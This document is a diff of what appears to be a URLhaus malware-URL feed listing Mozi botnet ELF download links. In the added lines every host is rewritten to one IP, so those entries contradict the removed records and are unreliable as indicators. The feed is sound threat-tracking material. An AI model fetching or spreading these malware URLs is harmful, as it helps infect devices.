-{"id":"961536","urlhaus_reference":"https://urlhaus.abuse.ch/url/961536/","url":"http://42.224.136.237:52794/Mozi.m","url_status":"online","host":"42.224.136.237","date_added":"2021-01-14 21:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961530","urlhaus_reference":"https://urlhaus.abuse.ch/url/961530/","url":"http://117.208.135.63:49312/Mozi.a","url_status":"offline","host":"117.208.135.63","date_added":"2021-01-14 21:05:34 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"false","tags":["elf","Mozi"]} -{"id":"961525","urlhaus_reference":"https://urlhaus.abuse.ch/url/961525/","url":"http://125.47.66.60:38961/Mozi.m","url_status":"online","host":"125.47.66.60","date_added":"2021-01-14 21:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961526","urlhaus_reference":"https://urlhaus.abuse.ch/url/961526/","url":"http://182.117.95.148:50420/Mozi.a","url_status":"online","host":"182.117.95.148","date_added":"2021-01-14 21:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961527","urlhaus_reference":"https://urlhaus.abuse.ch/url/961527/","url":"http://117.202.71.48:55007/Mozi.m","url_status":"online","host":"117.202.71.48","date_added":"2021-01-14 21:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961528","urlhaus_reference":"https://urlhaus.abuse.ch/url/961528/","url":"http://125.99.132.118:51143/Mozi.m","url_status":"online","host":"125.99.132.118","date_added":"2021-01-14 21:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961529","urlhaus_reference":"https://urlhaus.abuse.ch/url/961529/","url":"http://182.114.123.69:41003/Mozi.m","url_status":"online","host":"182.114.123.69","date_added":"2021-01-14 21:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961524","urlhaus_reference":"https://urlhaus.abuse.ch/url/961524/","url":"http://116.19.127.37:35739/Mozi.m","url_status":"offline","host":"116.19.127.37","date_added":"2021-01-14 21:04:38 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} -{"id":"961523","urlhaus_reference":"https://urlhaus.abuse.ch/url/961523/","url":"http://42.239.253.55:45653/Mozi.m","url_status":"offline","host":"42.239.253.55","date_added":"2021-01-14 21:04:36 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} -{"id":"961520","urlhaus_reference":"https://urlhaus.abuse.ch/url/961520/","url":"http://103.217.121.228:41349/Mozi.m","url_status":"offline","host":"103.217.121.228","date_added":"2021-01-14 21:04:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} -{"id":"961521","urlhaus_reference":"https://urlhaus.abuse.ch/url/961521/","url":"http://111.92.81.255:48586/Mozi.m","url_status":"offline","host":"111.92.81.255","date_added":"2021-01-14 21:04:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} -{"id":"961522","urlhaus_reference":"https://urlhaus.abuse.ch/url/961522/","url":"http://45.229.55.75:38111/Mozi.m","url_status":"offline","host":"45.229.55.75","date_added":"2021-01-14 21:04:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} -{"id":"961518","urlhaus_reference":"https://urlhaus.abuse.ch/url/961518/","url":"http://182.121.242.148:34556/Mozi.m","url_status":"online","host":"182.121.242.148","date_added":"2021-01-14 21:04:10 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} -{"id":"961519","urlhaus_reference":"https://urlhaus.abuse.ch/url/961519/","url":"http://106.115.189.249:59815/Mozi.m","url_status":"online","host":"106.115.189.249","date_added":"2021-01-14 21:04:10 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961516","urlhaus_reference":"https://urlhaus.abuse.ch/url/961516/","url":"http://182.117.93.110:50587/bin.sh","url_status":"online","host":"182.117.93.110","date_added":"2021-01-14 21:04:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} -{"id":"961517","urlhaus_reference":"https://urlhaus.abuse.ch/url/961517/","url":"http://110.251.5.169:48322/Mozi.m","url_status":"online","host":"110.251.5.169","date_added":"2021-01-14 21:04:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961515","urlhaus_reference":"https://urlhaus.abuse.ch/url/961515/","url":"http://101.51.117.186:33317/Mozi.m","url_status":"online","host":"101.51.117.186","date_added":"2021-01-14 21:04:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} -{"id":"961513","urlhaus_reference":"https://urlhaus.abuse.ch/url/961513/","url":"http://121.151.78.166:41516/Mozi.m","url_status":"online","host":"121.151.78.166","date_added":"2021-01-14 21:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} -{"id":"961514","urlhaus_reference":"https://urlhaus.abuse.ch/url/961514/","url":"http://116.72.92.97:57798/Mozi.m","url_status":"online","host":"116.72.92.97","date_added":"2021-01-14 21:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} -{"id":"961509","urlhaus_reference":"https://urlhaus.abuse.ch/url/961509/","url":"http://27.218.15.209:47671/Mozi.m","url_status":"online","host":"27.218.15.209","date_added":"2021-01-14 21:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} -{"id":"961510","urlhaus_reference":"https://urlhaus.abuse.ch/url/961510/","url":"http://120.85.171.210:57690/Mozi.m","url_status":"online","host":"120.85.171.210","date_added":"2021-01-14 21:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} -{"id":"961511","urlhaus_reference":"https://urlhaus.abuse.ch/url/961511/","url":"http://117.251.59.53:50611/i","url_status":"online","host":"117.251.59.53","date_added":"2021-01-14 21:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} -{"id":"961512","urlhaus_reference":"https://urlhaus.abuse.ch/url/961512/","url":"http://115.58.83.167:34141/Mozi.m","url_status":"online","host":"115.58.83.167","date_added":"2021-01-14 21:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} -{"id":"961507","urlhaus_reference":"https://urlhaus.abuse.ch/url/961507/","url":"http://94.178.124.83:44399/Mozi.m","url_status":"online","host":"94.178.124.83","date_added":"2021-01-14 20:52:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961508","urlhaus_reference":"https://urlhaus.abuse.ch/url/961508/","url":"http://182.122.75.232:49120/Mozi.m","url_status":"online","host":"182.122.75.232","date_added":"2021-01-14 20:52:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961506","urlhaus_reference":"https://urlhaus.abuse.ch/url/961506/","url":"http://115.63.202.43:51136/Mozi.m","url_status":"online","host":"115.63.202.43","date_added":"2021-01-14 20:52:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961504","urlhaus_reference":"https://urlhaus.abuse.ch/url/961504/","url":"http://59.99.40.204:45773/Mozi.m","url_status":"online","host":"59.99.40.204","date_added":"2021-01-14 20:52:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961505","urlhaus_reference":"https://urlhaus.abuse.ch/url/961505/","url":"http://117.247.128.213:56528/Mozi.m","url_status":"online","host":"117.247.128.213","date_added":"2021-01-14 20:52:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961500","urlhaus_reference":"https://urlhaus.abuse.ch/url/961500/","url":"http://14.137.219.132:44427/Mozi.a","url_status":"online","host":"14.137.219.132","date_added":"2021-01-14 20:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961501","urlhaus_reference":"https://urlhaus.abuse.ch/url/961501/","url":"http://42.224.40.14:36134/Mozi.m","url_status":"online","host":"42.224.40.14","date_added":"2021-01-14 20:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961502","urlhaus_reference":"https://urlhaus.abuse.ch/url/961502/","url":"http://186.33.104.107:43973/Mozi.m","url_status":"online","host":"186.33.104.107","date_added":"2021-01-14 20:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961503","urlhaus_reference":"https://urlhaus.abuse.ch/url/961503/","url":"http://85.105.16.154:41319/Mozi.m","url_status":"online","host":"85.105.16.154","date_added":"2021-01-14 20:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961496","urlhaus_reference":"https://urlhaus.abuse.ch/url/961496/","url":"http://178.141.73.115:51847/Mozi.a","url_status":"online","host":"178.141.73.115","date_added":"2021-01-14 20:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961497","urlhaus_reference":"https://urlhaus.abuse.ch/url/961497/","url":"http://186.33.104.135:54469/Mozi.m","url_status":"online","host":"186.33.104.135","date_added":"2021-01-14 20:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961498","urlhaus_reference":"https://urlhaus.abuse.ch/url/961498/","url":"http://115.56.159.43:34547/Mozi.m","url_status":"online","host":"115.56.159.43","date_added":"2021-01-14 20:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961499","urlhaus_reference":"https://urlhaus.abuse.ch/url/961499/","url":"http://42.230.138.170:33932/Mozi.m","url_status":"online","host":"42.230.138.170","date_added":"2021-01-14 20:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961548","urlhaus_reference":"https://urlhaus.abuse.ch/url/961548/","url":"http://89.160.20.156:34613/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:19:13 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"false","tags":["elf","Mozi"]} +{"id":"961546","urlhaus_reference":"https://urlhaus.abuse.ch/url/961546/","url":"http://89.160.20.156:44941/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"false","tags":["elf","Mozi"]} +{"id":"961547","urlhaus_reference":"https://urlhaus.abuse.ch/url/961547/","url":"http://89.160.20.156:37173/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"false","tags":["elf","Mozi"]} +{"id":"961545","urlhaus_reference":"https://urlhaus.abuse.ch/url/961545/","url":"http://89.160.20.156:47545/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"false","tags":["elf","Mozi"]} +{"id":"961544","urlhaus_reference":"https://urlhaus.abuse.ch/url/961544/","url":"http://89.160.20.156:44782/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:07:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961543","urlhaus_reference":"https://urlhaus.abuse.ch/url/961543/","url":"http://89.160.20.156:44359/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:07:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961540","urlhaus_reference":"https://urlhaus.abuse.ch/url/961540/","url":"http://89.160.20.156:56507/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:07:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961541","urlhaus_reference":"https://urlhaus.abuse.ch/url/961541/","url":"http://89.160.20.156:57562/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:07:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961542","urlhaus_reference":"https://urlhaus.abuse.ch/url/961542/","url":"http://89.160.20.156:48845/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:07:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961539","urlhaus_reference":"https://urlhaus.abuse.ch/url/961539/","url":"http://89.160.20.156:58245/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961538","urlhaus_reference":"https://urlhaus.abuse.ch/url/961538/","url":"http://89.160.20.156:37198/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:06:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961537","urlhaus_reference":"https://urlhaus.abuse.ch/url/961537/","url":"http://89.160.20.156:33524/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:06:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961531","urlhaus_reference":"https://urlhaus.abuse.ch/url/961531/","url":"http://89.160.20.156:48261/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961532","urlhaus_reference":"https://urlhaus.abuse.ch/url/961532/","url":"http://89.160.20.156:34478/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961533","urlhaus_reference":"https://urlhaus.abuse.ch/url/961533/","url":"http://89.160.20.156:35703/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961534","urlhaus_reference":"https://urlhaus.abuse.ch/url/961534/","url":"http://89.160.20.156:48666/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961535","urlhaus_reference":"https://urlhaus.abuse.ch/url/961535/","url":"http://89.160.20.156:53923/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961536","urlhaus_reference":"https://urlhaus.abuse.ch/url/961536/","url":"http://89.160.20.156:52794/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961530","urlhaus_reference":"https://urlhaus.abuse.ch/url/961530/","url":"http://89.160.20.156:49312/Mozi.a","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 21:05:34 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"false","tags":["elf","Mozi"]} +{"id":"961525","urlhaus_reference":"https://urlhaus.abuse.ch/url/961525/","url":"http://89.160.20.156:38961/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961526","urlhaus_reference":"https://urlhaus.abuse.ch/url/961526/","url":"http://89.160.20.156:50420/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961527","urlhaus_reference":"https://urlhaus.abuse.ch/url/961527/","url":"http://89.160.20.156:55007/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961528","urlhaus_reference":"https://urlhaus.abuse.ch/url/961528/","url":"http://89.160.20.156:51143/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961529","urlhaus_reference":"https://urlhaus.abuse.ch/url/961529/","url":"http://89.160.20.156:41003/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961524","urlhaus_reference":"https://urlhaus.abuse.ch/url/961524/","url":"http://89.160.20.156:35739/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 21:04:38 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961523","urlhaus_reference":"https://urlhaus.abuse.ch/url/961523/","url":"http://89.160.20.156:45653/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 21:04:36 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961520","urlhaus_reference":"https://urlhaus.abuse.ch/url/961520/","url":"http://89.160.20.156:41349/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 21:04:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961521","urlhaus_reference":"https://urlhaus.abuse.ch/url/961521/","url":"http://89.160.20.156:48586/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 21:04:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961522","urlhaus_reference":"https://urlhaus.abuse.ch/url/961522/","url":"http://89.160.20.156:38111/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 21:04:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961518","urlhaus_reference":"https://urlhaus.abuse.ch/url/961518/","url":"http://89.160.20.156:34556/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:04:10 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} +{"id":"961519","urlhaus_reference":"https://urlhaus.abuse.ch/url/961519/","url":"http://89.160.20.156:59815/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:04:10 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961516","urlhaus_reference":"https://urlhaus.abuse.ch/url/961516/","url":"http://89.160.20.156:50587/bin.sh","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:04:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961517","urlhaus_reference":"https://urlhaus.abuse.ch/url/961517/","url":"http://89.160.20.156:48322/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:04:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961515","urlhaus_reference":"https://urlhaus.abuse.ch/url/961515/","url":"http://89.160.20.156:33317/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:04:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} +{"id":"961513","urlhaus_reference":"https://urlhaus.abuse.ch/url/961513/","url":"http://89.160.20.156:41516/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} +{"id":"961514","urlhaus_reference":"https://urlhaus.abuse.ch/url/961514/","url":"http://89.160.20.156:57798/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} +{"id":"961509","urlhaus_reference":"https://urlhaus.abuse.ch/url/961509/","url":"http://89.160.20.156:47671/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} +{"id":"961510","urlhaus_reference":"https://urlhaus.abuse.ch/url/961510/","url":"http://89.160.20.156:57690/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} +{"id":"961511","urlhaus_reference":"https://urlhaus.abuse.ch/url/961511/","url":"http://89.160.20.156:50611/i","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961512","urlhaus_reference":"https://urlhaus.abuse.ch/url/961512/","url":"http://89.160.20.156:34141/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} +{"id":"961507","urlhaus_reference":"https://urlhaus.abuse.ch/url/961507/","url":"http://89.160.20.156:44399/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:52:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961508","urlhaus_reference":"https://urlhaus.abuse.ch/url/961508/","url":"http://89.160.20.156:49120/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:52:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961506","urlhaus_reference":"https://urlhaus.abuse.ch/url/961506/","url":"http://89.160.20.156:51136/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:52:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961504","urlhaus_reference":"https://urlhaus.abuse.ch/url/961504/","url":"http://89.160.20.156:45773/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:52:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961505","urlhaus_reference":"https://urlhaus.abuse.ch/url/961505/","url":"http://89.160.20.156:56528/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:52:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961500","urlhaus_reference":"https://urlhaus.abuse.ch/url/961500/","url":"http://89.160.20.156:44427/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961501","urlhaus_reference":"https://urlhaus.abuse.ch/url/961501/","url":"http://89.160.20.156:36134/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961502","urlhaus_reference":"https://urlhaus.abuse.ch/url/961502/","url":"http://89.160.20.156:43973/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 